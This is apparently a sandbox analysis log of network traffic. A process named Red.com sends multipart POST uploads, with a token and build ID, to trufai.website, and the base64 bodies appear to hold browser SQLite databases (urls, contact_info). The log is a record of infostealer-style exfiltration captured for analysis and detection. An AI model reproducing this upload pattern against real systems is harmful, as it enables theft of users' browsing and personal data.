2025-01-03 13:30:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:50 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2025-01-03 13:30:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:50 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49774	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:51 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----qq16fukf3wbsrqq1nycj User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:51 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 71 71 31 36 66 75 6b 66 33 77 62 73 72 71 71 31 6e 79 63 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 71 71 31 36 66 75 6b 66 33 77 62 73 72 71 71 31 6e 79 63 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 71 71 31 36 66 75 6b 66 33 77 62 73 72 71 71 31 6e 79 63 6a 0d 0a 43 6f 6e 74 Data Ascii: ------qq16fukf3wbsrqq1nycjContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------qq16fukf3wbsrqq1nycjContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------qq16fukf3wbsrqq1nycjCont
2025-01-03 13:30:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49775	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:52 UTC	282	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----rq9hd26p89zcjmohdtj5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 169765 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 72 71 39 68 64 32 36 70 38 39 7a 63 6a 6d 6f 68 64 74 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 72 71 39 68 64 32 36 70 38 39 7a 63 6a 6d 6f 68 64 74 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 72 71 39 68 64 32 36 70 38 39 7a 63 6a 6d 6f 68 64 74 6a 35 0d 0a 43 6f 6e 74 Data Ascii: ------rq9hd26p89zcjmohdtj5Content-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------rq9hd26p89zcjmohdtj5Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------rq9hd26p89zcjmohdtj5Cont
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:52 UTC	16355	OUT	Data Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54 Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2025-01-03 13:30:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49776	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
